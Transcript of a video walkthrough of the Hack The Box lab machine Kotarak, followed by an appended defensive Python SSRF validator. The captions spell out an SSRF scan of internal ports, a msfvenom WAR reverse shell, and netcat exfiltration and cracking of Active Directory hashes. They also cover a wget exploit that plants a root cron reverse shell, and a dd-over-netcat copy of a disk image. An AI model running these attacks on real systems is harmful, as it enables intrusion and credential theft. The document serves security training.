HackTheBox - Kotarak

Captions
What's going on YouTube, this is IppSec, and we're doing Kotarak from Hack The Box, which is a box full of pivots. I think a lot of people had trouble with two parts of this box. The first being the SSRF attack, server-side request forgery. Essentially the box has a script that just goes and downloads a web page, and we can use that to kind of act like a proxy and download a bunch of pages off localhost which are not exposed through the firewall. So this is a pretty cool attack that doesn't get a lot of publicity because it doesn't directly lead to code execution, but there's a lot of times it leads to very sensitive file disclosure or code execution through other means. I know there was a Black Hat talk from Orange Tsai, you can just Google "Orange Tsai SSRF", and he chains like an SSRF four times, doing protocol smuggling to get code execution in, I think, GitHub Enterprise, which was amazing. He had to go through a few SSRFs and eventually hit the memcached service and execute code off that, I believe.

The second part that gives people trouble is just listening on port 80, because to get root you have to exploit wget, which is doing a request to port 80, and unprivileged users can't listen on port 80 by default. So there's something installed on the box that lets you do that, authbind, and we'll get into that too: listen on port 80 and 21 to exploit wget, which just gets us actual root on this box. So let's jump in.

To start things off, let's do the normal nmap: -sC for default scripts, -sV to write versions, -oA to output all formats, the directory I'm going to throw it in is nmap and we'll call this initial, and then the IP address of Kotarak, which is 10.10.10.55 or in that. So let's just look at the results and we see four ports open: we got 22, 8009 and 8080... actually three ports, I can't count. And 8080 is Tomcat, we have Apache JServ on 8009 which I believe is related to Tomcat. So let's just try going to Tomcat, so 10.10.10.55:8080, and we just get a 404. I know a lot of Tomcats throw things in /manager/html, so I'm not even gonna bother dirbusting, and we get a username/password prompt. Try a few defaults like tomcat:tomcat, tomcat:s3cret with threes instead of E's, don't get anything. And I'm not gonna go too much more into that because it's got some type of thing that will lock the account if I try too much, so that's why I'm even gonna skip setting up a Hydra to go in the background, because again I don't want to lock any accounts.

So the next step will be to do a full port scan, so nmap -p- and then -oA to output all formats, nmap/allports, and the IP address of 10.10.10.55. The reason why I don't start off with all ports is because it can take a while depending on how the box is configured, so I always just do the basic ports and then set all ports in the background while I work. We see it has one additional port, so I'm not going to bother running a full scan against this again because we can just test out one port. It's listening on port 60000, so if we go to port 60000 we get "Welcome to Kotarak web hosting private browser. Use this private browser to surf the web and honestly please don't abuse it."

So my first step will be to set up a web server on my localhost and see if this page accesses it. So python -m SimpleHTTPServer, and I'm also going to split my window and do an ifconfig tun0 to get my IP address, 10.10.14.3. So let's go here and specify http://10.10.14.3. Don't see anything there, and we didn't get anything here. Again, I didn't realize I'm listening on port 80 or 8000, so let's go back and do 8000. We just get a directory listing, so we do hit it, and we don't have a user agent on this. If we had a user agent we could try to do some type of exploit, since if it said like Firefox this version, we'd know to search for exploits related to that Firefox version. Don't have anything, so we're going to stop the HTTP server, go back, and then I'm gonna do other things SSRF related. So we'll try file: and we do /etc/passwd, get a prompt that just says "try harder".

So I'm gonna play with this a little bit, we'll send this into Burp. So set my proxy up to intercept, send this request, send the request to Repeater, and all I want to say in the path is "file", and I get try harder. So I'm going to do "fil", and the reason I'm doing this is maybe try harder is what happens when the command errors out, so the command shouldn't work with just "fil", and we don't get try harder. So there's some type of regular expression searching for "file", so we can't use that. If I change the cases, maybe it's not a case-insensitive search, nope, still. Let's do it all caps, still nothing. So my next thing will be http://localhost, and we'll do :60000, let's see if we get any response, and we get the page back.

So I'm going to do a local port scan on this box of all ports, 1 to 65535. To do that I'm gonna use a tool called wfuzz. So if we do wfuzz -h, I think that will give us help. I want to use -c, output with colors, because colors are awesome. I'm gonna use -z with the range payload, and I think that's it. So we'll try that: wfuzz -c for colors, -z range,1-65535, that is all the TCP ports, and then http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ in caps. And we get a bunch of responses, and this is the number of characters, and there's two characters on like port 560, so let's see what 560 says. We get nothing. So what I'm going to do is add another one, --hl 2, and that's going to hide everything that has this 2 Ch, and we'll get ports back, so like 110, 290, 320. So if we go to 110 we get a page, so we can launch some type of dirbuster against this page. We have 200, "hello world"; 90, "under construction"; so we're getting a lot of web servers right now. 320 is the next one, super sensitive login page, maybe try like SQL injection against this page. Oh, what is that one, 888, simple file viewer. Let's just render this, and we have a few files: backup, blah, some tetris.c. So let's look at backup.

Going back to raw, table element, so ?doc=backup, so put a slash there, and I think we're gonna have to URL encode this 'cause Apache's gonna get really confused when we have two question marks. So URL encode that whole thing, and we get a page which looks like the Tomcat configuration, and admin with the password of "three, at, p, d, h, b, exclamation point". So I'm going to copy this and we're gonna try logging in to Tomcat. So we can just go to turn intercept off real quick, 10.10.10.55:8080, we need /manager/html, that's in my clipboard, so admin and paste that in, and we get the Tomcat web manager.

So now we have to create a malicious Tomcat file, or WAR file, to upload here and give us a shell. So let's do that. And the reason why we can do this is because this is the Tomcat Web Application Manager, so we can just upload a malicious web application that just has a shell hard-coded in it. So that's what we're doing. Thankfully msfvenom has a bunch of payloads that will help us create that WAR file. So do msfvenom -l to list all payloads, and then once this finishes we can search for Java. So search for Java, and we have java/jsp_shell_reverse_tcp. This will allow us to create a WAR file that sends us a reverse shell back. So do msfvenom -p java/jsp_shell_reverse_tcp, LHOST=10.10.14.3, LPORT= we'll do 80, -f war, and we'll call this epic.war. We're choosing war because this is what Tomcat wants. So we wrote the file and now let's browse to deploy it. So go to Documents, HTB boxes, Kotarak, epic.war, deploy it, we have it there. Let's listen on port 80, and the reason why I always do like port 80 or 443 or something like that is it can be a bit annoying when I want to start HTTP servers, but if any port is allowed through a firewall it's generally gonna be that. So if we just click on it, we get a connection back and this is a shell. So python -c 'import pty; pty.spawn("/bin/bash")', then Ctrl-Z, stty raw -echo, fg, and we have a real shell to this box.

So right off the bat I notice backups, so let's look in backups, and then it looks like another directory, backups. So go in backups, and we have tomcat-users again, look at this file, permission denied. OK, let's go to our home directory, this is the Tomcat one, let's check out /home, see if we can see anything there. We do find . to just list all the files, and we have tomcat, then to_archive/pentest_data. Do an ls and we see two files, a .dit file and a .bin, and I see psexec and ntds. This is stored on Windows Active Directory controllers, it's what contains a Windows domain's secrets, or it's the heart of Active Directory, contains all Active Directory information: group policies, users, etc., including passwords. So let's do a file * and we see the .dit, which is probably ntds.dit, is just data, it doesn't have a magic byte. The second one, the .bin, is an MS registry file, so since this is in pentest data I'm going to assume that this is the SYSTEM hive file, which contains the boot key that allows us to decrypt the dit.

So let's start exfilling these files. So we can do nc -lvnp, we'll say port 443 even though this isn't gonna be encrypted. I'm going to call this system, because that's what I think it's going to be. So nc 10.10.14.3, then port 443, I never hit enter here, and then redirect this file into it. Connection, saved, we do file, OK it has saved. So the next one, let's do ntds.dit, and we want... where's my netcat, I'll just check that and see, 10.10.14.3 443, and we're going to do the .dit file now, and we got both of those files. So we can do impacket-secretsdump -h, it's not too helpful, I think it's -ntds and then the file, -system then the SYSTEM registry hive file, and then LOCAL, I think that's the correct syntax. And now it's gonna go and parse everything. Again it got the target boot key from that SYSTEM file and then used that boot key to extract all the data out of ntds.dit. This could take a few more seconds; once it starts extracting hashes we know we're golden.

So we have a few hashes, we have Administrator, Guest, I don't care about Guest, these that end in this dollar sign are machine accounts and will have super strong passwords, so we're gonna ignore those, but I want atanas, Administrator and krbtgt. You're not gonna crack this password, but if there's a Windows box then this is a golden ticket, which means you can just forge anything, you can become anyone. So since I see a bunch of Windows stuff, let's go back over to the Tomcat box, the DMZ Kotarak box, the reverse shell, and do arp -a. This is gonna look at the ARP table and we can see what boxes are talking to it. We do see 10.0.3.133, so let's see if nmap is on the box, it's apparently not. nc, nc on the box, it looks like it is, so we can do 10.0.3.133 and 445, throw -v for verbose, failed; 3389, failed; 22 connects. So the reason I was doing that is I was trying to figure out if the box Kotarak is talking to is a Windows box or a Linux box. If it's a Windows box we could just craft a golden ticket and then walk right in, but since it's not, we'll have to crack some hashes.

So copy this and we will delete the ones with that dollar sign, OK, we don't care about that, oh, we only care about two hashes. So awk -F: to separate by colon, print $4, yep. And then let's just go to like HashKiller, and before we try to crack these manually I always just run them through an online tool, decrypt NTLM, and always verify something like this is within scope because some people may not like you sending their hashes to third parties. But we cracked two, we got f16tomcat and password123. So let's try SSH into the box, well we can, yeah, just throw up SSH. So usernames we got from that was atanas and Administrator, so I'm just gonna use atanas since Administrator is probably not a Linux account name. atanas@10.10.10.55, make sure I copy that, paste, no, we'll try password123, neither worked. Let's try root, didn't work, neither worked with SSH. But let's go back here and do su, so it looks like the atanas user just can't SSH, because I did f16tomcat and logged right in to atanas.

So the next step is to go into his home directory, and we have user.txt, and if we go to /root we see that we can read the flag because we're the owner, and we can also read app.log. And looking into app.log we do see wget that looks like it's being run every two minutes, and it's an old version of wget, wget 1.16. If we go over to our box we can do searchsploit wget and see that we have a vulnerability for wget < 1.18. So I'm gonna do searchsploit -m to mirror this file and let us look at exactly what this does. OK we're at the top, background, we got the introduction saying that wget can be tricked into saving a remote file supplied by the attacker, and this attack is going to save the file .wgetrc, which will allow us to get code execution the next time wget is run. So there's a lot of information about this attack, and this attack does require both FTP and HTTP. So still talking about... here we go, here's the very beginning, we have this cat and that end file, so copy that, we will go into /dev/shm on our box, paste, I'm going to look at what we just pasted. So we have the POST file, /etc/shadow, that's fine, we can read the shadow file, but the output document, /etc/cron.d/wget-root-shell, so this is the file we'll be saving, and we're saving a cron file. So nothing we want to edit there, so search for output document to get back to where we were, and it wants us to start up a Python FTP server.

So what I'm gonna do real quick is fix my tty a little bit, because I want to do another tmux. So I think we have tmux running, "open terminal failed", yep, we do have tmux. So if I open up a new terminal we can echo $TERM, so it doesn't know what type of terminal I'm using, so if I export that now I should be able to go into tmux. But I don't like how tmux is here, I want this to be down a bit, so you can change the columns, I think rows, rows, and we'll go to 40, we exit tmux, that's gotten down a little bit more, but I don't know what I want. So you do the stty -a in this terminal to see what it's set at, rows 39, columns 79, that doesn't look right, row 0 column 0 it says, so stty rows 39, stty columns 79, and we'll try tmux again, still weird, now looks fine. So that's what I had to do, it's looking better now, not exactly sure what I did, but if you monkey around like I just did you'll get tmux nested like I just did. So since tmux is nested I can hit my tmux key, which right now is Ctrl-B, twice and then control this session in here. And the main reason I wanted to use tmux in this is because a remote shell, or a reverse shell, is going over port 80, so if I wanted to get two connections to this box I would have to open up two different reverse shells, and that means I have to upload two different reverse shells because my port is hard-coded. So doing the nested tmux just allows me to do everything off one session. Hopefully that makes sense, it probably didn't, but I'm fine with it.

So we have to get back to where the FTP was, so python -m, I think we'll do it, yep. So if we copy this, and if we had just pasted this in we get an error, it's a permission denied because we can't listen on port 21. But this box has something called authbind installed, and if we just put authbind before that it lets us listen. So let's rerun that Python with authbind and verify we have that .wgetrc file, which we do. And then the next thing we have to do is copy this wget... or copy the exploit script. I've copied that, and let's go over here, we'll just call it exploit.py. I did the wrong clipboard, it looks like it's pasted, so HTTP_LISTEN_IP... all my columns is weird, as far as my cursor is going over, so instead of mucking around with the columns portion of my tty I'm just going to do the exploit here and then we'll copy it in. Again, wrong clipboard, for some reason I have to do :set paste, that's the great command. And we have to edit a few things. This HTTP_LISTEN_IP, we want this to be 10.10.10.55, the IP of Kotarak, and the FTP as well, so that's correct. This root cron, I don't really care for just doing /usr/bin/id and catting that to a file, I want to get a reverse shell. So I'm going to go to pentestmonkey, the reverse shell cheat sheet, and normally I would do something like a ping first, but because this is going on a cron, which means there's a lot of waiting involved, I'm just gonna jump the gun and go right for a reverse shell. So we're gonna put that to 10.10.14.3, which is my IP, and do port 8002, so that looks fine. Glancing over this I don't see anything else we need to change, so cat exploit, copy, paste, then cat to make sure it looks fine, it does. And now we got to do authbind python exploit.py, and we see it tested FTP and something came down here that said FTP session open, so that worked, and it's serving the wget exploit on port 80.

So the last thing to do is to see how long we'll have to be waiting for... oh man, there we go, I had screwed up my tmux windows. Sometimes when we nest tmux it gets a bit wonky. So if we go to /root we can cat app.log and see wget is running every two minutes, 48, 50, 52, so we should wait about two minutes and hopefully we'll see something. So I'm just gonna sleep 120 and then do some video editing magic to skip ahead in time, because waiting two minutes is boring. So it's been well over the two minutes and it should've run, so I'm gonna restart everything and we'll try again. I'm not exactly sure why the server didn't make a connection to us, but maybe just something didn't start off correctly. So let's try this again, and instead of actually doing the exploit script I'm just going to do netcat on port 80 to see if that server is still doing the wget request, and it's just taking a variable out, because the Python exploit script is saying it's not working, and it's relatively straightforward I believe.

So let's take a look at exploit.py while it's going. So it's just starting up SimpleHTTPServer; upon a GET request, check if Wget is in the user agent, if it's not do nothing, if Wget is, then upload .wgetrc via the FTP redirect vulnerability. And all that does is tell wget there's an HTTP redirect, which is a 301, and points it to the FTP server, and we can see while I was explaining that we have the server hitting it via netcat. So authbind works and it's getting a connection, it's grepping /usr/sbin... I swear I just did this before, OK, 10.10.10, let's see, 10.0.3.1. I know what the issue is, I'm listening on 10.10.10.55 and this has an interface on the 10.0.3 network. So let's edit exploit.py and we're going to change HTTP_LISTEN_IP to quad zeros, and this was the problem, I'm gonna cry. So authbind python exploit.py, running. So back to explaining it: we send a 301 redirect and point wget at an FTP file, and that just happily downloads whatever the redirect was. Then if the request is a POST request, again check wget in the header, if wget's not in the header do nothing, if it is in the header then the POST request is going to be from the file we told it to download, and we tell it to download a file in that .wgetrc file, and then we will also tell it to create that cron job. So in just a minute we should get a callback if that was the issue, so hopefully it is now listening on all interfaces, and if it was an issue with the interface we solved that problem. So give it another 15 to 30 seconds and see if we get a callback. There we go, we got the first hit, so it does have to be on quad zeros because I guess it's listening on a different interface. But as you see we uploaded the .wgetrc file, actually in /root, and it sent the redirect, and we can see down here on our FTP that anonymous logs in and does download .wgetrc. So in another two minutes it should do another request, and this time the request will have the contents of the shadow file, and it will also set up a cron job to send us a shell, and I believe that was on port 8002, so nc -lvnp 8002, and we will wait another few minutes for the cron job to kick off.

So I did some editing magic and cut out a piece, and there should be another wget request starting almost immediately, come on, there we go. And this time it gave us the contents of the shadow file, and interestingly enough the shadow file contained an ubuntu user, which isn't on our box, so this is definitely a VM, and we just pivoted and accessed a command on probably the host. But you can see that's the shadow file, and then it said it created the cron job and it should kick off within the next minute, so we'll just keep watching netcat on our host machine, and once that minute finishes we should get a prompt saying we're root on this box. And there we go, so we are now root. If we do ifconfig, it's in /usr/sbin, ifconfig, this IP address is 10.0.3.133, the hostname is kotarak-int, and over here the hostname is kotarak-dmz. Wait a second, something doesn't line up, because if this is the internal box and it's hosting LXC then this should have more interfaces, because you need like a bridge interface and other things. So did I miss something over here, /sbin/ifconfig, yeah, so the DMZ is actually the host of this because we have a bunch of LXC bridges here, these interfaces. So we are root here, and if we do wc -c root.txt we do get that, but let's look more at this, because if we have root, well, we should be able to just hop in the container. So oops, we're not a member of lxc, so let's ps -ef | grep lxc, see if we can find anything. I don't see the location, is it /var/lib/lxc, permission denied. But looking back at the groups, I am a member of disk, so that is another good group to be a member of. So if we do ls -la /dev/sd*, I think we can see I have read/write access to sda, sda1, 2 and 5, so let's look at which one of those I am mounted to.

And a lot of LXC stuff... I hate this little break, but since I'm doing nested tmux I don't think I can make that bigger without playing with stty columns and all that, so I don't want to do that. Let me clear, yes, mount, or let's mount -v. Oh I see, oh that's what I'm looking for, so /dev/mapper/kotarak-vg-..., and that is symlinked over to /dev/mapper/dm-0 or /dev/dm-0. OK, so I'm going to strings this file to see if I can read it, I can. So the next step is to netcat this over to me, so this is gonna be much like the Mirai machine. So nc -lvnp, we'll say 8002, and on this box we're going to do... let's see, do we have dcfldd, nope, we have dd, we do have dd. So I can do if= for input file, /dev/dd-0 is what we said... what did we say it was, crap, it's early or late, you want to look at it, /dev/mapper/kotarak..., dm, it's dm isn't it, yeah, dm-0, OK, bear with me, this will work. So dd if=/dev/dm-0, input file, and then we're not going to specify an output file, we're just gonna pipe this over to gzip, and this is going to zip standard in to standard out and spit it back to the terminal, and we're going to send that to me. So I used the same port, we'll do 8003, that's got a cron job running on it, so OK, do this, fix the IP, and I forgot something and that's gonna screw up my terminal, maybe clear, nope, making mistakes left and right. So we do disk.img.gz, OK, now it's sending.

So what we just did is we had dd take an image of the block device dm-0, we're zipping it up because, well, we're taking a block device and it has a lot of zeros and that compresses very well, we don't want to send a bunch of gigabytes down the wire if we don't have to. If we didn't have the gzip then the blocks that are just straight zeros, aka not written to yet, would get sent over the wire, so this fixes that and compresses other stuff, so it's gonna make the image a bit smaller. One thing I should have done is looked at the size of this before copying it down the wire, but we should... I'll have enough space. And the final thing is we pipe this over to netcat because I want to send this to me, so we're just sending the zipped disk image over to my netcat, which is piping it to a file. So if I open a new window I can do a file on disk.img.gz and I see it is gzip compressed data. So if we do a du -hs disk.img.gz we see it's 133 megs right now. So we're just going to let this go, I'm gonna pause the video because this could take a while to copy, however big this VM is, down. But once we copy the VM then we should be able to go into that /var/lib/lxc directory because we're the root of this system, so hopefully I make sense once we do it.

It's probably been about 20 minutes of uploading the image to my box but it is done, so we can do a du -hs on disk.img.gz, we see it is 2.2 gigs, and the disk image itself was 7.5 gigs, so the compression did help quite a bit. So the next step is to uncompress it, which again is gonna take a while, so I will put the video back on pause because I'm guessing this can be probably 5 or 10 minutes to decompress this image, so I'll see you guys in a second. The gunzip's now finished, it definitely didn't take that long at all. So if we do a file on disk.img we do see it is a Linux filesystem with needs journal recovery, extents, large files, huge files, but we're not gonna really worry about that, we're just gonna do mount disk.img /mnt and see if this mounts. It looks like it did, I even saw something pop up right here, but if we cd into /mnt we can then go into root, and I think this is the flag... that's only one byte, flag.txt, so this is... oh, I am glad that wasn't the flag because that is one line. I'm so used to doing wc -l to count lines, I should have done wc -c to see if it was safe, but no, 66, that's not 33, so we know that's not the flag. So the directory I wanted to go to would be /var/lib/lxc I believe, now we can go to kotarak-int, and if you're wondering under these directories, it's because, well, we did this in Calamity just a little bit of a different way. Going to rootfs, then root, wc -c, not -l, root.txt, and we can get the flag that way. We could also see things like /etc/shadow and potentially crack the ubuntu password, and if we cracked that ubuntu password we may have been able to just SSH right in.

So if we, let's see, arp -a, see who is my neighbor, /usr/sbin... that's really nice, did you see what just happened? I did arp -a, it says it's not available but it is located in /usr/sbin, so you may want to go run that, that's awesome. So let's see, can we SSH to this, yes we can, see, I know this password, is it f16tomcat, no. Is it the root password of atanas that I just magically know, it is not. So if we had cracked that ubuntu password then we would be able to get into the machine, but to get what we need we just needed the flag, which we're able to retrieve from the disk image. Additionally you may be able to write to the filesystem sneakily since we do have read/write on /dev/dm-0, yeah we do have read/write there, so we may be able to write to that disk and not cause any damage to the OS to give us root permission or do things like write a cron. So some things to think about: you should never give users access to that disk group, because having read access to block devices is bad. And that will conclude the video, I hope you guys enjoyed and I will see you next week.
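The "try harder" filter described in the video only rejects paths containing the string "file", which is exactly why http://localhost:PORT passes straight through and the internal services can be enumerated. The block below is an added example, not code from the video or from the Kotarak box: it puts that substring check beside the allow-list validator a defender would put in front of a URL-fetching feature (scheme and port allow-list, host resolution, rejection of loopback, private, link-local and IPv4-mapped addresses). The host names and addresses in the constructed DNS table are assumptions made for the demo.

```python
"""SSRF input validation for a "private browser" style URL fetcher.

Added example, not code from the video or from the Kotarak box. It contrasts
the weak check the box used (reject anything containing "file") with an
allow-list validator that also resolves the host and rejects non-public
addresses. Host names and addresses below are constructed for the demo.
"""
import ipaddress
import re
import socket
from urllib.parse import urlsplit


# --- the box's behaviour: "try harder" if the path contains "file" ----------
def weak_filter_allows(path: str) -> bool:
    """True if the substring filter would fetch this path. The video shows
    'file', 'fiLe' and 'FILE' all rejected, while http://localhost:60000
    sails through, so this filter blocks one scheme and nothing else."""
    return re.search(r"file", path, re.IGNORECASE) is None


# --- allow-list validator ---------------------------------------------------
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host: str) -> set[str]:
    """Resolve a host to every address it maps to (real DNS lookup)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(text: str) -> bool:
    """Reject loopback, RFC 1918, link-local, multicast, unspecified and
    reserved ranges; unwrap IPv4-mapped IPv6 so ::ffff:127.0.0.1 is caught."""
    ip = ipaddress.ip_address(text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_unspecified or ip.is_reserved)


def is_safe_target(url: str, resolve=resolve_all) -> tuple[bool, str]:
    """Return (allowed, reason). `resolve` is injectable so the check can be
    tested offline. A real fetcher must also connect to the address that was
    validated here (pin it), or a DNS rebinding answer can undo the check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addresses = resolve(parts.hostname)
    except OSError:
        return False, f"cannot resolve {parts.hostname}"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{parts.hostname} resolves to non-public {addr}"
    return True, "ok"


# Constructed DNS table for the demo; the names and addresses are assumptions.
CONSTRUCTED_DNS = {
    "localhost": {"127.0.0.1"},
    "internal.example": {"10.0.3.133"},      # like the box's LXC neighbour
    "mapped.example": {"::ffff:127.0.0.1"},  # IPv4-mapped loopback
    "public.example": {"93.184.216.34"},     # a globally routable address
}


def fake_resolve(host: str) -> set[str]:
    """Offline stand-in for resolve_all() backed by the constructed table."""
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror(f"constructed NXDOMAIN for {host}")
    return CONSTRUCTED_DNS[host]


if __name__ == "__main__":
    for url in ("file:/etc/passwd", "http://localhost:60000/",
                "http://internal.example:8080/manager/html",
                "http://mapped.example/", "https://public.example/"):
        print(f"{url:45} weak={weak_filter_allows(url)!s:5} "
              f"strict={is_safe_target(url, fake_resolve)}")
```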
Info
Channel: IppSec
Views: 25,850
Keywords: SSRF, ServerSide Request Forgery, wfuzz, tomcat, Linux Disk Group, ntds, wget exploit, authbind, ippsec, htb, Hack The Box, HackTheBox, wgetrc, wget, impacket, secretsdump
Id: 38e-sxPWiuY
Length: 51min 37sec (3097 seconds)
Published: Sat Mar 10 2018